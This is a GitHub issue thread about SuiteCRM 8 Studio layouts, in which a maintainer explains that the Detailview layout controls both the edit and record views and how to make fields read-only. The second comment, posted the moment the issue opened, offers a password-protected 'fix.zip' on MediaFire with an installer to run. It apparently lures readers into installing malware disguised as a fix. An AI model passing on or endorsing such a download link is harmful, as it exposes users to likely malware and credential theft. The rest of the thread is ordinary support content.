### ISSUE TITLE
The Editing view and Details View 's field is same (V8)

### ISSUE THREAD

**Issue by ChongCR** [salesagility/SuiteCRM-Core#538] opened 2024-08-29 04:21 UTC
### Issue

I am having problem where in my details view in "Leads" having 5 field, and when i click on edit, there actually some field i wanted to hide it and not letting user to modify / update it , I have configured it on studio but it still having the same field as details view after clicking edit 

Did anyone having this issues also ? help please 

### Steps to Reproduce the Issue

```bash
1.
2.
3.
...
```

### Version

8.6

### What browser are you currently using?

Chrome

### Environment Information

PHP 8.1

### Operating System and Version

Window 11

**Comment by africanobyamugisha** [comment] 2024-08-29 04:21
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by johnM2401** [comment] 2024-08-29 15:13
Hey!
Thank you for getting in touch!

<br>

To clarify the reason you are seeing the same fields on both views:

In SuiteCRM8, the "Detailview" found in Admin->Studio will control both the Edit and Record viewing modes on that Module.
So any amendments made to "Detailview" will affect both Editing and Viewing modes of a Record.


The "Editview" found in Admin->Studio will control the Legacy (SuiteCRM7) Edit View.
This normally is not seen on most modules, but can be regained by enabling Compatability mode for that module.

<br>
<br>

So, some suggestions for you, if you wish to have Read-only fields for a module:

<br>

1: -- Enable Compatability Mode for your required Modules
This can be done by amending the module_routing.yaml file
A brief guide on this can be found here: https://community.suitecrm.com/t/compatibility-mode-in-suitecrm-8/83355/4

This will lose Suite8-only functionality, but you will be able to see the changes made on the "Editview" layout in Studio

<br>
<br>


2: -- Alternatively, if you wish to keep the Suite8 view (and Suite8-only features)
You can make any field Read-Only by amending the DetailViewdDefs or Field Vardefs.

For example, in the Accounts Detailviewdefs file at:
```public/legacy/custom/modules/Accounts/metadata/detailviewdefs.php```

 I have the Phone_fax field:
![image](https://github.com/user-attachments/assets/94dc426c-a18d-41b9-ad45-a3a10ff7f1a8)

If I add ```'readonly'=>true```, this becomes Read Only after running a Quick Repair and Rebuild in the CRM
![image](https://github.com/user-attachments/assets/f0e9f584-96bc-465c-88db-1703f41de911)
![image](https://github.com/user-attachments/assets/688bf794-4b13-40d2-9d4b-0e3da34338ff)


<br>

Alternatively, via the field vardefs:
I've added the file:
```public/legacy/custom/Extension/modules/Accounts/Ext/Vardefs/phonefield.php```
With the content:
```
<?php

$dictionary['Account']['fields']['phone_office']['readonly'] = true;

```

This will achieve the same results as the above change to the DetailViewDefs file.


<br>
<br>

3: -- Finally, you can Show/Hide any field from Edit OR Detail Views using custom logic, with more information found here:
https://docs.suitecrm.com/8.x/developer/extensions/frontend/logic/field-logic/fe-extensions-display-logic/


<br>
<br>

I'll close this ticket off for now, as this is expected behaviour, but please let us know if you have any further issues or questions around the CRM.

Thanks again!

**Closed by johnM2401** 2024-08-29 15:13 UTC
Labels: Type: Bug

**Comment by ChongCR** [comment] 2024-09-02 09:16
Hi thank you for the clear explaination, sorry that I still having question, if I have set readonly for the details view, but edit view I want it to be writeable, how can i do that? Thanks in advance !

**Comment by johnM2401** [comment] 2024-09-02 12:53
Hey!

hmmmm, I suppose it depends whether you want to use the SuiteCRM8 views or the Compatibility mode.

<br>

In SuiteCRM8, the "Detailview" layout in studio controls _both_ Edit and Record Viewing modes.

As the SuiteCRM8 views do not currently have inline editing behaviour, all fields are already "Read Only" on Record View mode and writeable on Edit Mode.

(As users can only edit fields by entering the Edit Mode)

<br>
<br>

As far as i'm aware, The only way to have Read Only Detailview & Writeable on Editview (as separate items), is to use the Compatability mode.

If you're using compatability mode for a module, you can enable/disable "Inline editing" for specific fields via Admin->Studio->[Module]->Fields->[Field Name]

If Inline Editing is Enabled, users can update the field on Detailview
If Inline Editing is disabled, users can **not** update the field on Detailview

<br>

Hopefully this is what you were looking for?
Thanks!
